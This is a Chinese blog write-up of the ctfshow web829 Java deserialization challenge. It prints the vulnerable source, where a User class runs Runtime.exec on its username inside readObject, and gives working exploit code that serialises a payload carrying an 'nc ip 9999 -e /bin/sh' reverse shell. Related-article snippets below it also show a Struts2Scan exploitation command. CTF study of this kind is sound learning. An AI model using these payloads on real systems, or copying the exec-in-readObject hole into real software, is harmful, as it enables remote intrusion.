ctfshow-web829

最新推荐文章于 2024-02-17 00:00:16 发布
最新推荐文章于 2024-02-17 00:00:16 发布
阅读量559 收藏
点赞数 3
分类专栏: ctfshow 文章标签: java servlet 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lastwinn/article/details/125559085
版权

一、题目分析

学习java的不知道第几天,还是菜,今天来把ctfshow的题目刷刷然后写写记录吧。有什么不对的欢迎指正。

给了我们源码,看index里面,先是创建一个user类,空的,然后对传入的参数userData进行base64加密,虽然我是第一次见这个函数,但是这个名字就,哈哈哈,是base64没错了。

然后创建一个对象输入流,(这里我对什么输出流、输入流还是分不清。这次做完题看完代码之后总算是 分清了。)传入的参数是一个字节数组输入流,字节数组输入流里面传入的是一个字节数组。创建好之后去调用readObject方法,这个方法就是反序列化,类似于php的unserialize函数,不过java是面向对象的,所以需要先创建对象。然后强制转化为User类,其中任何一步出错都会进入异常,返回base64 decode error。

package com.ctfshow.controller;

@Controller
@RequestMapping("/")
public class IndexController {

    @RequestMapping(value = "/",method = RequestMethod.POST)
    @ResponseBody
    public String index(HttpServletRequest request){
        User user=null;
        try {
            byte[] userData = Base64.getDecoder().decode(request.getParameter("userData"));
            ObjectInputStream objectInputStream = new ObjectInputStream(new ByteArrayInputStream(userData));
            user = (User) objectInputStream.readObject();
        }catch (Exception e){
            return "base64 decode error";
        }

        return "unserialize done, you username is "+user.getName();
    }

    @RequestMapping(value = "/",method = RequestMethod.GET)
    @ResponseBody
    public String index(){
        return "plz post parameter 'userData'  to unserialize";
    }
}


package com.ctfshow.entity;

public class User implements Serializable {

    private static final long serialVersionUID = -3254536114659397781L;
    private String username;

    public User(String username) {
        this.username = username;
    }

    public String getName(){
        return this.username;
    }

    private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
        in.defaultReadObject();
        Runtime.getRuntime().exec(this.username);
    }
}

下面就是一个User类,只有继承了Serializable才能进行反序列化(如果没继承的话,反射可以绕过,不过我不是很懂,就只调试过一次,然后差不多也忘了,哈哈。),我们可以看到有一个readObject方法,是不是和之前的readObject方法一样,调用的就是这里,类似于php的__destruct,一个反序列化的入口点,可以看到里面是执行系统命令的,参数为username,到这里我们就能想到,创建一个User类,使他的username为我们需要执行的命令,然后去反序列化,再base64加密,然后传入就能执行我们想要的命令了。

二、写代码咯

这里有一个坑,我是新手,才知道的,就java反序列化的时候会解析包名的,所以我们本地创建类的时候是需要设置好包路径的,不能错,不然服务器找不到那个类呢。

代码如下,第一行就是创建User类了,然后传入的是username

后面是一个函数,其实这里不用创建函数,之前也讲了,我不清楚这个输入输出,就去网上找了一个函数,我们来看一下函数里面,先是创建一个字节数组输出流,我们需要把字节数组输出流放入对象输出流,然后这个对象输出流就创建好了,然后调用writeObject方法,这个就是序列化的函数了,因为bo时候一个字节数组输出流,可以调用toByteArray方法来转化为字节数组,然后函数就结束,然后接着就是对字节数组进行一个base64加密,然后再使用for循环输出,这就是payload。

User a = new User("nc ip 9999 -e /bin/sh");
        byte[] bytes = ObjectToByte(a);
        byte[] userData  = Base64.getEncoder().encode(bytes);
        for(int x= 0 ; x < userData.length; x++) {
            // 打印字符
            System.out.print((char)userData[x]);
        }

 public static byte[] ObjectToByte(Object obj) {
        byte[] bytes = null;
        try {
            // object to bytearray
            ByteArrayOutputStream bo = new ByteArrayOutputStream();
            ObjectOutputStream oo = new ObjectOutputStream(bo);
            oo.writeObject(obj);
            bytes = bo.toByteArray();
            bo.close();
            oo.close();
        } catch (Exception e) {
            e.printStackTrace();
        }
        return bytes;
    }

 

然后服务器监听,burp发包就可以了。

 

三、总结

1、 对对象输入输出流的认识有了一点点新的认识。

2、对序列化和反序列化有了一点新的认识。

3、明白了反序列化需要对应包路径的。

angelkat
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【标题】"CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$" 指的是一项网络安全竞赛中的Web题目,该题目重点在于理解PHP编程语言中的变量循环取值机制。在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种...
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
CTFSHOW 常用姿势篇(821-831)
羽的博客
06-09 1618
ctfshow 常用姿势篇
ctfshowJAVA
njh18790816639的博客
04-16 2636
web279~279 这里便是跑脚本的事了! python Struts2Scan.py -u http://892a1226-9adc-4c5b-a700-c1ba9ca6ee26.challenge.ctf.show:8080/login.action 然后进行利用 python Struts2Scan.py -u http://892a1226-9adc-4c5b-a700-c1ba9ca6ee26.challenge.ctf.show:8080/login.action -n S2-009 --e
ctfshow web入门(java)
qq_53263789的博客
07-19 801
ctfshow
ctfshow web入门 java 295 298-300
m0_64815693的博客
04-08 1349
ctfshow web入门 java 295 298-300
ctfshow- java
qq_45951598的博客
08-25 545
web279-294 296-297 yu师傅脚本通杀 下载 下载链接:https://pan.baidu.com/s/19yr0tWbG1UU_ULjEan5ttQ 提取码:bn71 具体用法在md文件中,例如 检测 python Struts2Scan.py -u http://94c4c47e-4fb3-408c-97d7-56a5094f84a7.chall.ctf.show/S2-001/login.action 利用 python Struts2Scan.py -u http://94c4c47
ctfshow-web41~60-WP
最新发布
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
CTFShow-周末大挑战parse-url篇Writeup
05-19
这篇Writeup主要涉及的是CTF(Capture The Flag)挑战中的Web安全领域,特别是URL解析漏洞的利用。CTF是一项网络安全竞赛,参与者通过解谜、破解密码等方式获取“国旗”(Flag),在这里指的是挑战的答案或关键信息...
CTFshow Java
starttv的博客
11-17 1264
OGNL表达式通过#来访问struts的对象,struts框架通过过滤#字符防止安全问题,然而通过unicode编码(\u0023)或8进制(\43)即绕过了安全限制,对于S2-003漏洞,官方通过增加安全配置(禁止静态方法调用和类方法执行等)来修补,但是安全配置被绕过再次导致了漏洞,攻击者可以利用OGNL表达式将这2个选项打开,S2-003的修补方案把自己上了一个锁,但是把锁钥匙给插在了锁头上。通常tomcat的做法是解压,编译里面的代码,所以当文件很多的时候,tomcat的启动会很慢。
ctfshow-web831
lastwinn的博客
07-01 443
记录自己的所学以及理解。
CtfshowJava反序列化
weixin_56537388的博客
08-15 480
发现进入URLsteamhander,他的hashcode使用了getAddress,我们最终要做的就是调用getaddress,获取DNS解析。调用hashmap最后调用的是url的hashcode方法,在最后调用getaddress。重写是子类对父类可以访问方法的重新编写,返回值和形参都不能改变,可以看到,put的时候调用了hashcode,不是-1了。,子类对象赋值给父类使用,但是不能访问在子类特有的方法。这里的初始值是-1,只有为-1才能传数据。ysoserial工具。这里使用了重写的概念。
ctf刷题 ctfshow【网鼎杯】
weixin_44807430的博客
01-07 2268
纯粹学安全
Web】CTFSHOW java刷题记录(全)
uuzeray的博客
02-17 1281
给了war包,解压得到class文件,用java反编译工具来读源码。进行一波S2-009 showcase rce的搜。直接访问/getFlag路径回显如下,这条路走不通。不能直接读环境变量,拿个whoami意思一下(进行一波S2-008 devmode的搜。打不出来啊,只能用羽师傅的脚本了。进行一波S2-037的搜。进行一波S2-045的搜。进行一波S2-032的搜。进行一波S2-033的搜。进行一波S2-016的搜。进行一波S2-019的搜。进行一波S2-029的搜。进行一波S2-048的搜。
CTFSHOW web入门 java反序列化篇 web855
羽的博客
12-13 1913
ctfshow java反序列化
CTFSHOW JAVA
羽的博客
12-17 3719
WEB279-294 296-297 脚本通杀 下载 下载链接:https://pan.baidu.com/s/19yr0tWbG1UU_ULjEan5ttQ 提取码:bn71 具体用法在md文件中,例如 检测 python Struts2Scan.py -u http://94c4c47e-4fb3-408c-97d7-56a5094f84a7.chall.ctf.show/S2-001/login.action 利用 python Struts2Scan.py -u http://94c4c47e-4f
CTFshow刷题日记-WEB-JAVAweb279-300)Struts2全漏洞复现,Java漏洞复现
热门推荐
Love&Share
10-12 1万+
全部题都是struts2框架漏洞 Struts2是用Java语言编写的一个基于MVC设计模式的Web应用框架 关于struts2漏洞,vulhub都有环境并且给出了漏洞原理和poc GitHub项目地址:https://github.com/vulhub/vulhub/tree/master/struts2 判断网站是否基于Struts2的方法链接 通过页面回显的错误消息来判断,页面不回显错误消息时则无效 通过网页后缀来判断,如.do .action,有可能不准 如果配置文件中常数extension的值
java安全入门【持续更新】
weixin_51458899的博客
03-27 3532
java安全入门 概述 发现一个总体学习路线:Java Web基础 – EastJun’s Blog 发现一个入门网站:https://how2j.cn/?p=50613 了解了javaEE Java EE,Java 平台企业版(Java Platform Enterprise Edition),之前称为Java 2 Platform, Enterprise Edition (J2EE),2018年3月更名为 Jakarta EE(这个名称应该还没有得到群众认可)。是 Sun 公司为企业级应用推出的标准平
ctfshow-web-web红包题
07-14
ctfshow-web-web红包题是一道CTF比赛中的网络安全题目。这道题目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值